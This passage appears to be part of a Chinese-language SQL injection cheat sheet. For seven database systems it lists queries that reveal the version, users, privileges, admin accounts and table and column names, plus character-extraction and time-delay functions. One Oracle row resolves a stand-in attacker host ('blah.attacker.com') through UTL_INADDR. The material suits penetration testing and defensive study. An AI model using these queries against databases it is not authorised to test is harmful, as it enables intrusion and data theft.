select name, tbname, coltype from sysibm.syscolumns
-
获取版本
select versionnumber, version_timestamp from sysibm.sysversions
-
当前用户
select user from sysibm.sysdummy1
-
-
select session_user from sysibm.sysdummy1
-
-
select system_user from sysibm.sysdummy1
-
用户权限
select * from syscat.tabauth
管理员才能运行
-
select * from syscat.dbauth where grantee = 当前用户
-
-
select * from syscat.tabauth where grantee = 当前用户
-
-
select * from SYSIBM.SYSUSERAUTH
列出DB2系统权限
列出DBA账户
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'
-
选择第N行
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only
返回从第M行开始的N行(N、M需替换为具体数字)
选择第N个字符
SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1
返回b
ASCII值-字符
select chr(65) from sysibm.sysdummy1
返回A
字符-ASCII值
select ascii('A') from sysibm.sysdummy1
返回65
字符串连接
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1
返回abc
-
select 'a' || 'b' from sysibm.sysdummy1
返回ab
2、MySQL数据库
释义
SQL语句
其他
当前数据库
SELECT database()
-
所有数据库
SELECT schema_name FROM information_schema.schemata
版本>5.0
-
SELECT distinct(db) FROM mysql.db
管理员权限才可以执行
查询表名
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
-
查询列名
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
-
获取版本
SELECT @@version
-
当前用户
SELECT user()
-
-
SELECT system_user()
-
用户权限
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges
用户权限
-
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges
数据库权限
-
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges
字段的权限
列出DBA账户
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'
-
选择第N行
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0
行从0开始编号
-
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1
行从0开始编号
选择第N个字符
SELECT substr('abcd', 3, 1)
返回c
ASCII值-字符
SELECT char(65)
返回A
字符-ASCII值
SELECT ascii('A')
返回65
字符串连接
SELECT CONCAT('A','B')
返回AB
-
SELECT CONCAT('A','B','C')
返回ABC
时间睡眠
SELECT BENCHMARK(1000000,MD5(‘A’))
-
-
SELECT SLEEP(5)
版本>= 5.0.12
3、Oracle数据库
释义
SQL语句
其他
当前数据库
SELECT global_name FROM global_name
—
-
SELECT name FROM v$database
—
-
SELECT instance_name FROM v$instance
—
-
SELECT SYS.DATABASE_NAME FROM DUAL
—
所有数据库
SELECT DISTINCT owner FROM all_tables
—
查询表名
SELECT table_name FROM all_tables
—
-
SELECT owner, table_name FROM all_tables
—
查询列名
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'
—
-
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'
—
获取版本
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
—
-
SELECT banner FROM v$version WHERE banner LIKE 'TNS%'
—
-
SELECT version FROM v$instance
—
当前用户
SELECT user FROM dual
—
用户权限
SELECT * FROM session_privs
当前权限
-
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'
列出用户的权限
列出DBA账户
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'
—
选择第N行
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9
第九行(注意:ROWNUM在ORDER BY之前赋值,因此得到的不一定是按username排序后的第九行)
选择第N个字符
SELECT substr('abcd', 3, 1) FROM dual
第3个字符c
ASCII值-字符
SELECT chr(65) FROM dual
返回A
字符-ASCII值
SELECT ascii('A') FROM dual
返回65
字符串连接
SELECT 'A' || 'B' FROM dual
返回AB
时间睡眠
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual
如果反向查询很慢
-
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual
如果正向查询很慢
4、MSSQL数据库
释义
SQL语句
其他
当前数据库
SELECT DB_NAME()
-
所有数据库
SELECT name FROM master..sysdatabases
-
-
SELECT DB_NAME(N)
N为0,1,2,…
查询表名
SELECT name FROM master..sysobjects WHERE xtype = 'U'
-
-
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'
-
查询列名
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')
当前数据库
-
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'
列出master..sometable的列名称
获取版本
SELECT @@version
-
当前用户
SELECT user_name()
-
-
SELECT system_user
-
-
SELECT user
-
用户权限
SELECT permission_name FROM master..fn_my_permissions(null,'DATABASE')
当前数据库权限
-
SELECT is_srvrolemember('sysadmin')
当前用户权限
列出DBA账户
SELECT is_srvrolemember('sysadmin')
当前用户是否是管理员,是则返回1
选择第N行
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC
返回第九行
选择第N个字符
SELECT substring('abcd', 3, 1)
返回c
ASCII值-字符
SELECT char(0x41)
返回A
字符-ASCII值
SELECT ascii('A')
返回65
字符串连接
SELECT 'A' + 'B'
返回AB
时间睡眠
WAITFOR DELAY ‘0:0:5’
睡眠5秒
5、PostgreSQL数据库
释义
SQL语句
其他
当前数据库
SELECT current_database()
-
所有数据库
SELECT datname FROM pg_database
-
查询表名及列名
SELECT relname, A.attname FROM pg_class C, pg_namespace N,pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
-
查询表名
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
-
获取版本
SELECT version()
-
当前用户
SELECT user;
-
-
SELECT current_user;
-
-
SELECT session_user;
-
-
SELECT usename FROM pg_user;
-
-
SELECT getpgusername();
-
用户权限
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
-
列出DBA账户
SELECT usename FROM pg_user WHERE usesuper IS TRUE
-
选择第N行
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0
从0行开始编号
-
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
-
选择第N个字符
SELECT substr('abcd', 3, 1)
返回c
ASCII值-字符
SELECT chr(65)
返回A
字符-ASCII值
SELECT ascii('A')
返回65
字符串连接
SELECT 'A' || 'B'
返回AB
时间睡眠
SELECT pg_sleep(10)
睡眠10秒
-
SELECT sleep(10)
需先自行创建sleep函数(非内置函数)
6、Ingres数据库
释义
SQL语句
其他
当前数据库
select dbmsinfo('database');
-
所有数据库
SELECT name FROM iidatabase
连接到数据库
查询表名
select table_name, table_owner from iitables;
-
-
select relid, relowner, relloc from iirelation;
-
-
select relid, relowner, relloc from iirelation where relowner != '$ingres';
-
查询列名
select column_name, column_datatype, table_name, table_owner from iicolumns;
-
获取版本
select dbmsinfo('_version')
-
当前用户
select dbmsinfo('session_user')
-
-
select dbmsinfo('system_user')
-
用户权限
select dbmsinfo('db_admin')
-
-
select dbmsinfo('create_table')
-
-
select dbmsinfo('create_procedure')
-
-
select dbmsinfo('security_priv')
-
-
select dbmsinfo('select_syscat')
-
选择第N行
select first 10 blah from table
返回前10行
选择第N个字符
select substr('abc', 2, 1)
返回b
ASCII值-字符
-
-
字符-ASCII值
-
-
字符串连接
select 'abc' || 'def'
返回abcdef
时间睡眠
-
-
7、Informix数据库
释义
SQL语句
其他
当前数据库
SELECT DBSERVERNAME FROM systables where tabid = 1
-
所有数据库
select name, owner from sysdatabases;
-
查询表名
select tabname, owner FROM systables;
-
-
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
-
查询列名
select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
-
获取版本
SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1
-
-
SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1
-
当前用户
SELECT USER FROM systables WHERE tabid = 1
-
-
select CURRENT_ROLE FROM systables WHERE tabid = 1
-
用户权限
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid
哪些用户可以访问哪些程序
选择第N行
select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc
选择第10行
选择第N个字符
SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1
返回C
ASCII值-字符
-
-
字符-ASCII值
select ascii('A') from systables where tabid = 1
返回65
字符串连接
SELECT 'A' || 'B' FROM systables where tabid = 1
返回AB
-
SELECT concat('A', 'B') FROM systables where tabid = 1